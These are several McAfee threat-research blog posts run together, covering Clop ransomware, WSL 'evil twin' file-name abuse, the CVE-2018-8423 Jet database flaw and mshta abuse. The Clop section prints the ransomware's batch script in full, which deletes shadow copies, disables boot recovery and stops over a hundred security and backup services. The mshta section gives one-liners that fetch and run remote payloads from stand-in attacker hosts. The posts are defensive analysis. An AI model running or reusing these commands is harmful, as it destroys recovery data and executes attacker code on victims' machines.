The malware does not have support for Windows XP in its use with the crypto functions, because the CSP used in Windows XP has another name, but if run in another operating system starting with Windows Vista, it can change the name in the debugger to acquire the context later and will generate a RSA public blob.

Another difference with other ransomware families is that Clop will only cipher the disk that is a physical attached/embedded disk (type 3, FIXED or removable (type 2)). The malware ignores the REMOTE type (4)).

Anyways, the shares can be affected using the “MPR.DLL” functions without any problem.

FIGURE 11. Filemark in the crypted file and key used ciphered

After encrypting, the file will try to open in the same folder the ransom note and, if it exists, it will continue without overwriting it to save time, but if the ransom note does not exist it will access one resource in the malware called “OFFNESTOP”. This resource is crypted with the same XOR operation as the first resource: the .bat file, after decrypting, will write the ransom note in the folder of the file.

FIGURE 12. Creation of the ransom note from a crypted resource

Here is a sample of the ransom note of the first version of this malware:

FIGURE 13. Example of ransom note of the first version of the malware

After this, Clop will continue with the next file with the same process however, the check of the name based with the hash is avoided now.

Second Version of the Malware

The second version found by the end of February has some changes if it is compared with the first one. The hash of this version is: “ed7db8c2256b2d5f36b3d9c349a6ed0b”.

The first change is some changes in the strings in plain text of the code to make the execution in the “EraseTape” call and “FindAtomW” call more slowly. Now the names are for the tape: “” and the atom “”.

The second change is the name of the resources crypted in the binary, the first resource that is a second batch file to delete the shadow volumes and remove the protections in the boot of the machine as the previous one has another name: “RC_HTML1”.

FIGURE 14. New resource name for the batch file

However, the algorithm to decrypt this resource is the same, except that they changed the big string that acts as a key for the bytes. Now the string is: “JLKHFVIjewhyur3ikjfldskfkl23j3iuhdnfklqhrjjio2ljkeosfjh7823763647823hrfuweg56t7r6t73824y78Clop”. It is important to remember that this string remains in plain text in the binary but, as it has changed, it cannot be used for a Yara rule. The same counts for the name of the resources and also for the hash of the resource because the bat changes per line in some cases and in another as it will have more code to stop services of products of security and databases.

The contents of the new BAT file are:

@echo off

vssadmin Delete Shadows /all /quiet

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

bcdedit /set {default} recoveryenabled No

bcdedit /set {default} bootstatuspolicy ignoreallfailures

vssadmin Delete Shadows /all /quiet

net stop SQLAgent$SYSTEM_BGC /y

net stop “Sophos Device Control Service” /y

net stop macmnsvc /y

net stop SQLAgent$ECWDB2 /y

net stop “Zoolz 2 Service” /y

net stop McTaskManager /y

net stop “Sophos AutoUpdate Service” /y

net stop “Sophos System Protection Service” /y

net stop EraserSvc11710 /y

net stop PDVFSService /y

net stop SQLAgent$PROFXENGAGEMENT /y

net stop SAVService /y

net stop MSSQLFDLauncher$TPSAMA /y

net stop EPSecurityService /y

net stop SQLAgent$SOPHOS /y

net stop “Symantec System Recovery” /y

net stop Antivirus /y

net stop SstpSvc /y

net stop MSOLAP$SQL_2008 /y

net stop TrueKeyServiceHelper /y

net stop sacsvr /y

net stop VeeamNFSSvc /y

net stop FA_Scheduler /y

net stop SAVAdminService /y

net stop EPUpdateService /y

net stop VeeamTransportSvc /y

net stop “Sophos Health Service” /y

net stop bedbg /y

net stop MSSQLSERVER /y

net stop KAVFS /y

net stop Smcinst /y

net stop MSSQLServerADHelper100 /y

net stop TmCCSF /y

net stop wbengine /y

net stop SQLWriter /y

net stop MSSQLFDLauncher$TPS /y

net stop SmcService /y

net stop ReportServer$TPSAMA /y

net stop swi_update /y

net stop AcrSch2Svc /y

net stop MSSQL$SYSTEM_BGC /y

net stop VeeamBrokerSvc /y

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

net stop VeeamDeploymentService /y

net stop SQLAgent$TPS /y

net stop DCAgent /y

net stop “Sophos Message Router” /y

net stop MSSQLFDLauncher$SBSMONITORING /y

net stop wbengine /y

net stop MySQL80 /y

net stop MSOLAP$SYSTEM_BGC /y

net stop ReportServer$TPS /y

net stop MSSQL$ECWDB2 /y

net stop SntpService /y

net stop SQLSERVERAGENT /y

net stop BackupExecManagementService /y

net stop SMTPSvc /y

net stop mfefire /y

net stop BackupExecRPCService /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop klnagent /y

net stop MSExchangeSA /y

net stop MSSQLServerADHelper /y

net stop SQLTELEMETRY /y

net stop “Sophos Clean Service” /y

net stop swi_update_64 /y

net stop “Sophos Web Control Service” /y

net stop EhttpSrv /y

net stop POP3Svc /y

net stop MSOLAP$TPSAMA /y

net stop McAfeeEngineService /y

net stop “Veeam Backup Catalog Data Service” /

net stop MSSQL$SBSMONITORING /y

net stop ReportServer$SYSTEM_BGC /y

net stop AcronisAgent /y

net stop KAVFSGT /y

net stop BackupExecDeviceMediaService /y

net stop MySQL57 /y

net stop McAfeeFrameworkMcAfeeFramework /y

net stop TrueKey /y

net stop VeeamMountSvc /y

net stop MsDtsServer110 /y

net stop SQLAgent$BKUPEXEC /y

net stop UI0Detect /y

net stop ReportServer /y

net stop SQLTELEMETRY$ECWDB2 /y

net stop MSSQLFDLauncher$SYSTEM_BGC /y

net stop MSSQL$BKUPEXEC /y

net stop SQLAgent$PRACTTICEBGC /y

net stop MSExchangeSRS /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop McShield /y

net stop SepMasterService /y

net stop “Sophos MCS Client” /y

net stop VeeamCatalogSvc /y

net stop SQLAgent$SHAREPOINT /y

net stop NetMsmqActivator /y

net stop kavfsslp /y

net stop tmlisten /y

net stop ShMonitor /y

net stop MsDtsServer /y

net stop SQLAgent$SQL_2008 /y

net stop SDRSVC /y

net stop IISAdmin /y

net stop SQLAgent$PRACTTICEMGT /y

net stop BackupExecJobEngine /y

net stop SQLAgent$VEEAMSQL2008R2 /y

net stop BackupExecAgentBrowser /y

net stop VeeamHvIntegrationSvc /y

net stop masvc /y

net stop W3Svc /y

net stop “SQLsafe Backup Service” /y

net stop SQLAgent$CXDB /y

net stop SQLBrowser /y

net stop MSSQLFDLauncher$SQL_2008 /y

net stop VeeamBackupSvc /y

net stop “Sophos Safestore Service” /y

net stop svcGenericHost /y

net stop ntrtscan /y

net stop SQLAgent$VEEAMSQL2012 /y

net stop MSExchangeMGMT /y

net stop SamSs /y

net stop MSExchangeES /y

net stop MBAMService /y

net stop EsgShKernel /y

net stop ESHASRV /y

net stop MSSQL$TPSAMA /y

net stop SQLAgent$CITRIX_METAFRAME /y

net stop VeeamCloudSvc /y

net stop “Sophos File Scanner Service” /y

net stop “Sophos Agent” /y

net stop MBEndpointAgent /y

net stop swi_service /y

net stop MSSQL$PRACTICEMGT /y

net stop SQLAgent$TPSAMA /y

net stop McAfeeFramework /y

net stop “Enterprise Client Service” /y

net stop SQLAgent$SBSMONITORING /y

net stop MSSQL$VEEAMSQL2012 /y

net stop swi_filter /y

net stop SQLSafeOLRService /y

net stop BackupExecVSSProvider /y

net stop VeeamEnterpriseManagerSvc /y

net stop SQLAgent$SQLEXPRESS /y

net stop OracleClientCache80 /y

net stop MSSQL$PROFXENGAGEMENT /y

net stop IMAP4Svc /y

net stop ARSM /y

net stop MSExchangeIS /y

net stop AVP /y

net stop MSSQLFDLauncher /y

net stop MSExchangeMTA /y

net stop TrueKeyScheduler /y

net stop MSSQL$SOPHOS /y

net stop “SQL Backups” /y

net stop MSSQL$TPS /y

net stop mfemms /y

net stop MsDtsServer100 /y

net stop MSSQL$SHAREPOINT /y

net stop WRSVC /y

net stop mfevtp /y

net stop msftesql$PROD /y

net stop mozyprobackup /y

net stop MSSQL$SQL_2008 /y

net stop SNAC /y

net stop ReportServer$SQL_2008 /y

net stop BackupExecAgentAccelerator /y

net stop MSSQL$SQLEXPRESS /y

net stop MSSQL$PRACTTICEBGC /y

net stop VeeamRESTSvc /y

net stop sophossps /y

net stop ekrn /y

net stop MMS /y

net stop “Sophos MCS Agent” /y

net stop RESvc /y

net stop “Acronis VSS Provider” /y

net stop MSSQL$VEEAMSQL2008R2 /y

net stop MSSQLFDLauncher$SHAREPOINT /y

net stop “SQLsafe Filter Service” /y

net stop MSSQL$PROD /y

net stop SQLAgent$PROD /y

net stop MSOLAP$TPS /y

net stop VeeamDeploySvc /y

net stop MSSQLServerOLAPService /y

The next change is the mutex name. In this version it is “HappyLife^_-“, so, can it be complex to make a vaccine based on the mutex name because it can be changed easily in each new sample.

The next change is the hardcoded public key of the malware that is different to the previous version.

Another change is the file created; the first version creates the file with the name “Favourite” but this version creates this file with the name “Comone”.

However, the algorithm of crypto of the files and the mark in the file crypted is the same.

Another difference is in the ransom note that is now clearer with some changes in the text and now has 3 emails instead of one to contact the ransomware developers.

FIGURE 15.Example of the new ransom note

Other Samples of the Malware

Clop is a ransomware family that its authors or affiliates can change in a quick way to make it more complex to track the samples. The code largely remains the same but changing the strings can make it more difficult to detect and/or classify it correctly.

Now we will talk about the changes of some samples to see how prolific the ransomware Clop is.

Sample 0403db9fcb37bd8ceec0afd6c3754314 has a compile date of 12 February, 2019 and has the following changes if compared with other samples:

  • The file created has the name “you_offer.txt”.
  • The name of the device in the fake call to “EraseTape” and “DefineDosDeviceA” functions is “..1”.
  • An atom searched for nothing has the name of “$$$$”.
  • The mutex name is “MoneyP#666”.
  • The resources crypted with the ransom note and the bat file are called “SIXSIX1” for the batch file and the another one for the ransom note “SIXSIX”.
  • The name of the batch file is “clearsystems-10-1.bat”.
  • The key for the XOR operation to decrypt the ransom note and the batch file is:

“Clopfdwsjkjr23LKhuifdhwui73826ygGKUJFHGdwsieflkdsj324765tZPKQWLjwNVBFHewiuhryui32JKG”

  • The batch file is different to the other versions, in this case not changing the boot config of the target victim.

FIGURE 16. Another version of the batch file

  • The email addresses to contact are: icarsole@protonmail.com and unlock@eaqltech.su .
  • As a curiosity, this ransom note has a line that another does not have: “Every day of delay will cost you additional +0.5 BTC” (about 1500-1700 $).

The 3ea56f82b66b26dc66ee5382d2b6f05d sample has the following points of difference:

  • The name of the file created is “popup.txt”.
  • The DefineDosDeviceA name is “1234567890”
  • The mutex is “CLOP#666”.
  • The date of compiled this sample is 7 of February.
  • The name of the bat file is “resort0-0-0-1-1-0-bat”.
  • This sample does not have support for Windows XP because a API that does not exist in Windows XP.
  • The Atom string is “27”.

Sample 846f93fcb65c9e01d99b867fea384edc , has these differences:

  • The name of the file created is “HotGIrls”.
  • The DosDevice name is “GVSDFDS”.
  • Atom name: KLHJGWSEUiokgvs.
  • Batch file name “clearnetworksdns-11-22-33.bat”.
  • The email address to contact: unlock@eqaltech.su, unlock@royalmail.su and lestschelager@protonmail.com.
  • The ransom note does not have the previous string of increasing the price, but the maximum number of files that can be decrypted is 7 instead of 6..

As the reader can understand, Clop changes very quickly in strings and name of resources to make it more complex to detect the malware.

We also observed that the .BAT files were not present in earlier Clop ransomware versions.

Global Spread

Based on the versions of Clop we discovered we detected telemetry hits in the following countries:

  • Switzerland
  • Great Britain
  • Belgium
  • United States
  • The Netherlands
  • Croatia
  • Porto Rico
  • Germany
  • Turkey
  • Russia
  • Denmark
  • Mexico
  • Canada
  • Dominican Republic

Vaccine

The function to check a file or a folder name using the custom hash algorithm can be a problem for the malware execution due if one of them is found in execution, the malware will avoid it. If this happens with a folder, all the files inside that folder will be skipped as well.

As the algorithm and the hash is based on 32bits and only in upper case characters, it is very easy to create a collision as we know the target hashes and the algorithm

It cannot be used as vaccine on itself, but it can be useful to protect against the malware if the most critical files are inside of a collision folder name.

FIGURE 17. Collision of hashes

In the screenshot “BOOT” is a correct name for the hash, but the others are collisions.

This malware has a lot of changes per version that avoid making a normal vaccine using mutex, etc.

The Odd One in the Family

That not all ransomware is created equally, especially goes for Clop. Earlier in this blog we have highlighted some interesting choices the developers made when it came to detecting language settings, processes and the use of batch files to delete the shadow volume copies. We found in the analysis some unique functions compared with other ransomware families.

However, Clop does embrace some of the procedures we have seen with other ransomware families by not listing the ransom amount or mentioning a bitcoin address.

Victims must communicate via email instead of with a central command and control server hosting decryption keys. In the newer versions of Clop, victims are required to state their company name and site in the email communications. We are not absolutely sure why this is, but it might be an effort to improve victim tracking.

Looking at the Clop ransom note, it shares TTPs with other ransomware families; e.g. it mimics the Ryuk ransomware and contains similarities with BitPaymer, however the code and functions are quite different between them.

Coverage

Customers of McAfee gateway and endpoint products are protected against this version.

  • GenericRXHA-RK!3FE02FDD2439
  • GenericRXHA-RK!160FD326A825
  • Trojan-Ransom
  • Ransom-Clop!73FBFBB0FB34
  • Ransom-Clop!0403DB9FCB37
  • Ransom-Clop!227A9F493134
  • Ransom-Clop!A93B3DAA9460
  • GenericRXHA-RK!35792C550176
  • GenericRXHA-RK!738314AA6E07
  • RDN/Generic.dx
  • bub
  • BAT/Ransom-Clob
  • BAT/Ransom-Blob

McAfee ENS customers can create expert rules to prevent batch command execution by the ransomware. A few examples are given below for reference.

The following expert rule can be used to prevent the malware from deleting the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).

When the expert rule is applied at the endpoint, deletion of shadow volume fails with the following error message:

The malware also tries to stop McAfee services using command “net stop McShield /y”. The following expert rule can be used to prevent the malware from stopping McAfee Services:

When the expert rule is applied at the endpoint, the attempt to stop McAfee service using net command fails with the following error message:

Indicators of Compromise

The samples use the following MITRE ATT&CK™ techniques:

  • Execution through API (Batch file for example).
  • Application processes discovery with some procedures as the hashes of the name, and directly for the name of the process.
  • File and directory discovery: to search files to encrypt.
  • Encrypt files.
  • Process discovery: enumerating all processes on the endpoint to kill some special ones.
  • Create files.
  • Create mutants.

Conclusion

Clop ransomware shows some characteristics that enterprises are its intended targets instead of end consumers. The authors displayed some creative technical solutions, to detect the victim’s language settings and installed programs. On the other hand, we also noticed some weird decisions when it came to coding certain functionalities in the ransomware. Unfortunately, it is not the first time that criminals will make money with badly programmed malware.

Clop is constantly evolving and even though we do not know what new changes will be implemented in the future, McAfee ATR will keep a close watch.

IOCs

  • bc59ff12f71e9c8234c5e335d48f308207f6accfad3e953f447e7de1504e57af
  • 31829479fa5b094ca3cfd0222e61295fff4821b778e5a7bd228b0c31f8a3cc44
  • 35b0b54d13f50571239732421818c682fbe83075a4a961b20a7570610348aecc
  • e48900dc697582db4655569bb844602ced3ad2b10b507223912048f1f3039ac6
  • 00e815ade8f3ad89a7726da8edd168df13f96ccb6c3daaf995aa9428bfb9ecf1
  • 2f29950640d024779134334cad79e2013871afa08c7be94356694db12ee437e2
  • c150954e5fdfc100fbb74258cad6ef2595c239c105ff216b1d9a759c0104be04
  • 408af0af7419f67d396f754f01d4757ea89355ad19f71942f8d44c0d5515eec8
  • 0d19f60423cb2128555e831dc340152f9588c99f3e47d64f0bb4206a6213d579
  • 7ada1228c791de703e2a51b1498bc955f14433f65d33342753fdb81bb35e5886
  • 8e1bbe4cedeb7c334fe780ab3fb589fe30ed976153618ac3402a5edff1b17d64
  • d0cde86d47219e9c56b717f55dcdb01b0566344c13aa671613598cab427345b9
  • cff818453138dcd8238f87b33a84e1bc1d560dea80c8d2412e1eb3f7242b27da
  • 929b7bf174638ff8cb158f4e00bc41ed69f1d2afd41ea3c9ee3b0c7dacdfa238
  • 102010727c6fbcd9da02d04ede1a8521ba2355d32da849226e96ef052c080b56
  • 7e91ff12d3f26982473c38a3ae99bfaf0b2966e85046ebed09709b6af797ef66
  • e19d8919f4cb6c1ef8c7f3929d41e8a1a780132cb10f8b80698c8498028d16eb
  • 3ee9b22827cb259f3d69ab974c632cefde71c61b4a9505cec06823076a2f898e

The post Clop Ransomware appeared first on McAfee Blogs.

The Twin Journey, Part 1

Summary and Introduction:

The recent changes in Windows 10, aiming to add case sensitivity (CS) at directory level, have prompted our curiosity to investigate the potential to use CS as a mean of obfuscation or WYSINWYG (What You See is NOT What you Get). While CS was our entry point, we then ventured into other file naming techniques to achieve similar outcomes.

Threats and Red Teams may include these techniques in their arsenal to execute various versions of persistence tricks, scan avoidance, security bypass or, in extreme cases, make the system totally unusable.

As part of this blog we use the term “Evil Twins” to describe a scenario where 2 files on disk are crafted using specific file naming techniques to confuse security mechanisms, leading to the good twin being scrutinized while the evil twin flies under the radar.

This is part of a series that will explore each of the different scenarios and techniques we researched.

Evil Twins and WSL (Windows Sub-System for Linux) to the Rescue

Windows Linux Subsystem introduces a set of new cool features and provides interoperability between Linux & Windows, including the ability to execute ELF files.

Some time ago, case sensitiveness was enabled by default when using DRVFS, the file system driver that allows to mount Windows drives. (C:\\, D:\\) from a WSL instance.

After some internal releases it was removed, and case-sensitiveness did change over time in terms of CS inheritance, including the restriction to change sensitiveness of folders that already have “twins”.

The following technique relies on the ability to mount DRVFS with case=force that will literally override any case-sensitiveness set for any directory.

Any attacker that has admin rights and wants to achieve any of the following goals can rely on this approach to:

  • Persist & Hide files
  • Make the OS unusable
  • Stop many products from starting (even if they have other kinds of protection).
  • Alter dlls loaded to control the applications.

This scenario is based on the premise that WSL and a Linux distribution are installed. In case those requirements are not met, scripts that automate that process, or even importing your custom distribution.

For complex scenarios where installing WSL & importing a distribution is required, even although it’s possible to di programmatically for any adversary and even remove WSL, it will still be very noisy in terms of suspicious activities whether the workstation does not belong to a developer for instance. As time goes on, many companies that have Linux development will include WSL as part of the daily basics for developer workstations, servers, etc.

The execution steps would include something like:

  1. Enable WSL
  2. Check if a distribution is already installed / Install it if missing
  3. Look for LXSS and enable DRVFS force flag
  4. Depending on how the twin will be created you can do several things:
    1. Create a WSL conf file with automount options. This is optional since you can remount the /mnt/c folder with new options.
    2. Copy files from the rootfs folder in Windows to preserve permissions (read/execute/etc.) without messing with ACL’s on the Linux side.
      1. Approach #1: Create the proper files without starting bash until the end (only touching Windows files): Ex: One of the scripts just copies the environment file and, if it is empty, it adds some content, so it is executed from bashrc next time bash is launched.
      2. Approach #2: Create the proper files from bash itself, so you do not need to mess with permissions (this will depend on how systems will be alerted by detecting bash execution, etc.)
    3. Terminate WSL instances.
    4. Start bash (by using a task, autorun, or just as part of the PowerShell script)
      1. From here you can just execute commands on the POC example, depending on the script arguments; the commands to be executed are of /etc/bashrc file.
      2. VOILA, the script will create a folder or copy the twin dll in a non-cs enabled folder, thus promoting the twin as the file to look for next time.

Sample script:

Executing the technique to implant an Evil Twin dll: (replacing IEPROXY.dll for a mock that will just change the background)

The IEPROXY.DLL implant taking effect😊

Watch the video recorded by our expert Cedric Cochin, illustrating the entire technique:

Outcomes for this technique include:

  • A piece of ransomware creating C:\Windows\SYSTEM32 twin folder and not allowing a normal boot.
  • A targeted attack could create a IEPROXY.DLL so next time any application loads the dll it will load the compromised dll.
  • A targeted attack could create a C:\Program Files\[FAVORITE VENDOR] to disable such application, if the application is not CS aware/compatible

Protection and Detection with McAfee Products:

  • By using Endpoint Security Expert Rules, the registry key required to execute the entire workflow can be protected.
  • Active Response:
    • Setup a trigger to be notified of this situation whenever this registry key or a file is modified
      • File Trigger with condition: Files name equals wsl.conf”
      • Registry Trigger with condition: WinRegistry keypath starts with HKLM\System\ControlSet001\Services\lxss
    • Custom collector: PowerShell Script that can find duplicated names in a folder. (Scanning the entire disk may take longer that search timeout)
    • Files collector if enabled, looking for wsl.conf modifications.
      • “Files where Files name equals wsl.conf”
    • WinRegistry Collector :
      • “WinRegistry where WinRegistry keypath starts with HKLM\System\ControlSet001\Services\lxss”
  • MVISION EDR:
    • File collector if enabled, looking for wsl.conf modifications.
      • “Files where Files name equals wsl.conf”
    • WinRegistry Collector:
      • “WinRegistry where WinRegistry keypath starts with HKLM\System\ControlSet001\Services\lxss”

  • Historical search activity

Artifacts involved:

  • Modification of HKLM:\System\CurrentControlSet\Services\lxss\DrvFsAllowForceCaseSensitivity
  • Bash execution
  • Creation of new folder / dll (twin)
  • Optional:
    • Creation of /etc/wsl.conf ( Can be tracked from Windows rootfs folder)
    • Wslconfig /t execution to terminate instances
    • Installation / Download of Linux distribution or tar file import
    • WSL enabled

The post The Twin Journey, Part 1 appeared first on McAfee Blogs.

Jet Database Engine Flaw May Lead to Exploitation: Analyzing CVE-2018-8423

In September 2018, the Zero Day Initiative published a proof of concept for a vulnerability in Microsoft’s Jet Database Engine. Microsoft released a patch in October 2018. We investigated this flaw at that time to protect our customers. We were able to find some issues with the patch and reported that to Microsoft, which resulted in another vulnerability, CVE-2019-0576, which was fixed on 8-Jan-2018 (Microsoft Jan 2019 Patch Tuesday).

The vulnerability exploits the Microsoft Jet Database Engine, a component used in many Microsoft applications, including Access. The flaw allows an attacker to execute code to escalate privileges or to download malware. We do not know if the vulnerability is used in any attacks; however, the proof of concept code is widely available.

Overview

To exploit this vulnerability, an attacker needs to use social engineering techniques to convince a victim to open a JavaScript file which uses an ADODB connection object to access a malicious Jet Database file. Once the malicious Jet database file is accessed, it calls the vulnerable function in msrd3x40.dll which can lead to exploitation of this vulnerability.

Although the available proof of concept causes a crash in wscript.exe, any application using this DLL is susceptible to the attack.

The following error message indicates the vulnerability was successfully triggered:

The message shows an access violation occurred in the vulnerable DLL. This vulnerability is an “out-of-bounds write,” which can be triggered via OLE DB, the API used to access data in many Microsoft applications. This type of vulnerability indicates that data can be written outside of the intended buffer, resulting in a crash. The cause of the crash is the maliciously crafted Jet database file. The file exploits an index field in the Jet database file format with an unexpectedly large number, resulting in an out-of-bounds write and, ultimately, the preceding crash.

The following diagram provides a high-level view of how the exploit works:

Exploit in Action

The proof of concept code contains one JavaScript file (poc.js), which calls a second file (group1). This is the Jet database file. By running poc.js through wscript.exe, we can trigger the crash.

As we see in the preceding image, we can review debug information to determine the function that crashes is “msrd3x40!TblPage::CreateIndexes.” Furthermore, we can determine that the program is trying to write data and failing. Specifically, we can see that the program is using the “esi” register to write to the location [edx+ecx*4+574h], but that location is not accessible.

We need to understand how this location is constructed to provide clues to the root cause. The debug information shows that register ecx contains the value 0x00002300. Edx is a pointer to memory that we will see again later. Finally, they are added together with an offset of 574 hexadecimal bytes to reference the memory location. From this information, we can guess the type of data that is stored there. It appears to be an array in which each variable is 4 bytes long and starts at the location edx+574h. While tracking the program, we determined the value 0x00002300 comes from the proof-of-concept file group1.

We know that the program attempts to write out of bounds and we know where the attempt occurs. Now we need to determine why the program attempts to write at that location. We investigate the user-provided data of 0x00002300 to understand its purpose. To do this we must understand the Jet database file.

Analyzing the Jet Database File

Many researchers have extensively analyzed the Jet database file structure. Some of the details of previous work can be found at the following links:

To summarize, a Jet database file is organized as a collection of pages, as shown in the following image:

The header page contains various information related to the file:

After the header come 126 bytes, RC4 encrypted, with the specific key 0x6b39dac7, which is the same for every JetDB file. Comparing the key value with the proof-of-concept file, we can identify that group1 is a Jet Version 3 file.

Further examination leads to a Table Definition Pages section, which describes various data structures for a table. (Click here for details.)

The table definition data has various fields, including two of note: Index Count and Real Index Count.

We can determine the value of these in our proof-of-concept file. When we check this with the group1 file, we see following:

There are total of two indexes in the Index Count. When we parse both indexes we see the familiar value of 0x00002300:

Our offending value 0x00230000 is the index number for index2 in the table. This index seems rather large and leads to the crash. Why does it crash the program? Further parsing the file, we find the names of the two indexes:

Debugging

With a debugger attached, we can see that first program calls the function “msrd3x40!operator new.” This allocates memory that stores the memory pointer address in eax:

After the memory is allocated, the program creates the new index:

This index number is used later in the execution. The function msrd3x40!Index::Restore copies that index number to the index address + 24h. This process is repeated in a loop for all indexes. First it calls the “new” operator, which allocates the memory. It then creates an index on that address and moves the index number to the base address of the index +24h. We see this move in the following code, which shows the malicious index value copied to newly created index:

Once successfully moved, the function msrd3x40!NamedObject::Rename is called and copies the index name value to the index address +40h:

If we look at the esi register, we see it points to the address of the index. The ecx register has a value of [esi+24h], which is the index number:

After a few more instructions, we can observe the original crash instructions. Edx points to the memory location. Ecx contains a very large number from the file group1. The program tries to access memory at location [edx+ecx*4+574h], which will cause the out-of-bounds write and the program crashes:

What is happening with the data the program tries to write? If we watch the instructions, we see that program tries to write the value of esi to [edx+ecx*4+574]. If we print esi or the previous value, we see that it contains the index name ParentIdName, which we saw in group1:

 

Ultimately, the program crashes while trying to process ParentIDName with a very large index number. The logic:

  • Allocate the memory and get the pointer to the start of the memory location.
  • From the start of memory location +574h, the program saves pointers to index names with each occupying 4 bytes multiplied by the index number mentioned in the file.

If the index number is very large, as in this case, and no validation is done, then the program will try to write out of bounds and crash.

Conclusion

This is a logic error and such errors are sometimes hard to catch. Many developers take extra precautions to avoid these types of bugs in their code. It is even more unfortunate when these bugs lead to serious security issues such as with CVE-2018-8423. When these issues are discovered and patched, we recommend applying the vendor patch as soon as possible to reduce your security risks.

Microsoft patches can be downloaded and installed from the following locations for respective CVEs:

CVE-2018-8423

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8423

CVE-2019-0576

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0576

McAfee Detection:

McAfee Network Security Platform customers are protected from this vulnerability by Signature IDs 0x45251700 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2018-8423) and 0x4525890 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2019-0576).

McAfee AV detects malicious file as BackDoor-DKI.dr .

McAfee HIPS, GBOP (Generic Buffer Overflow Protection) feature might cover this, depending on the process used to exploit the vulnerability.

We thank Steve Povolny of McAfee’s Advanced Threat Research team, and Bing Sun and Imran Ebrahim of McAfee’s Hybrid Gateway Security team for their support and guidance with this analysis.

 

References

The post Jet Database Engine Flaw May Lead to Exploitation: Analyzing CVE-2018-8423 appeared first on McAfee Blogs.

What Is Mshta, How Can It Be Used and How to Protect Against It

The not-so Usual Suspects

There is a growing trend for attackers to more heavily utilize tools that already exist on a system rather than relying totally on their own custom malware.

Using .hta files or its partner in crime, mshta.exe, is an alternative to using macro enabled document for attacks and has been around a long time. It is a tool so flexible it even has its own cell on the MITRE ATT&CK matrix.

What Makes Mshta Dangerous?

To start, it is a signed, native Microsoft binary that already exists on Windows that can execute code in a variety of ways, and in today’s living off the land culture that attackers love, this makes it a prime application of interest since code execution can be proxied through it.

Mshta.exe can also be used to bypass application whitelisting defenses and browser security settings.

These types of binaries have been colloquially dubbed “LOLBINs” but more formally have been turned into techniques within the Mitre tactic of Execution. Techniques T1218 and T1216: Signed binary proxy execution and Signed Script Proxy Execution, respectively.[1]

How It Is Used:

The most interesting abuse of native Windows binaries is the ability to run a program that will either execute passed in code, or that will execute a payload hosted remotely. This was quite popular with Casey Smith’s squibblydoo and squiblytwo attacks where regsvr32 and wmic (also considered LOLBINs) were both found to be signed windows binaries able to execute code hosted remotely.

Example 1: A remote file being executed:

   mshta.exe http[:]//malicioussite.com/superlegit.hta

Example 2: Mshta used to execute inline JScript/Vbscript.

Note: this syntax only works in cmd but will give an error if executed in PowerShell.

   mshta vbscript:(CreateObject(“WS”+”C”+”rI”+”Pt.ShEll”)).Run(“powershell”,1,True)(window.close)

Example 3: Calling a public method named Exec in a com scriptlet with JavaScript:

   mshta javascript:a=GetObject(“script:http://c2[.]com/cmd.sct”).Exec()

source : https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor.sct

Note: notice the similarities between the usage of mshta with the exec method and the corresponding use in regsvr32 in the above gist.

Alternatively, a file with a .hta extension can just as easily be double clicked on by the user where the code is set to autorun on open much like a macro enabled document.

Availability in Public Tools

There is no shortage of easily accessible repos to help someone quickly generate a payload to use mshta. .hta file type generation is available in nearly all public red-teaming tools such as Empire, Metasploit, Unicorn, and Koadic.

Do not forget, however, that mshta’s use is not limited to .hta files. It can also call code registered inside of com scriptlets (.sct) so it is relevant to other tools such as GreatSCT.

It’s also worth noting that even if you have powershell.exe blocked, tools like nps payload have .hta files that dynamically build a project and compile it with msbuild (another tool to be weary of) to create a tool that can execute powershell commands without using powershell.exe at all.

In The Wild:

One of my favorite tools to look for examples is app.any.run. It is an interactive online sandbox and is a great resource for finding new samples. You can even filter by MITRE ATT&CK Technique which is what I did here:

As you can see, there is no shortage of samples to go through. Another interesting detail is we can see several different file extensions used outside of the standard .hta and even some where the sandbox has found there are no threats detected. Is that true though?

Here we can see it has a dubious name of windows-update.hta running from a temp folder. This looks to be a binary embedded within an .hta file to trick automated sandbox detection.

Here we look at another sample with no threats detected.

sha256: 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

We see multiple file extensions used in the name to try and fool end users into thinking it is a picture. The script appears to be using WMI to spawn a new process which breaks the “expected” process chain of mshta > PowerShell and can allow malware to bypass rules that look for a direct process relationship such as Word > PowerShell.

We can also see the sandbox believes this is not malicious based on its scoring. Luckily, we can look at the PowerShell code that it spawns and get a better idea.

Process tree for 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

So, mshta can also be used to execute vbscript and WMI to break the process tree chain and launch PowerShell.

And in the below example you can see mshta’s role in continuing part of an infection chain in common malware.

Use of exploit then using mshta to execute remote code spawning the rest of the infection chain

Protection and Recommendations

One of the easiest things you can implement is to change the default applications for files with an .hta extension from mshta.exe to a plain text editor such as notepad to help keep users from unwittingly double clicking a malicious .hta attachment

If you are a McAfee customer, McAfee Endpoint Security (ENS) provides rules 322, which is now enabled by default, and 324 that can be enabled in ePO to help protect your environment against malicious mshta abuse.[2]

You should also spend some time exploring where abusable native binaries like mshta.exe are used in your environment. If there are no business needs that require it, blocking it outright is advised. If it is required, understand where and why so you can find the systems running things like mshta.exe that aren’t expected to be.

 

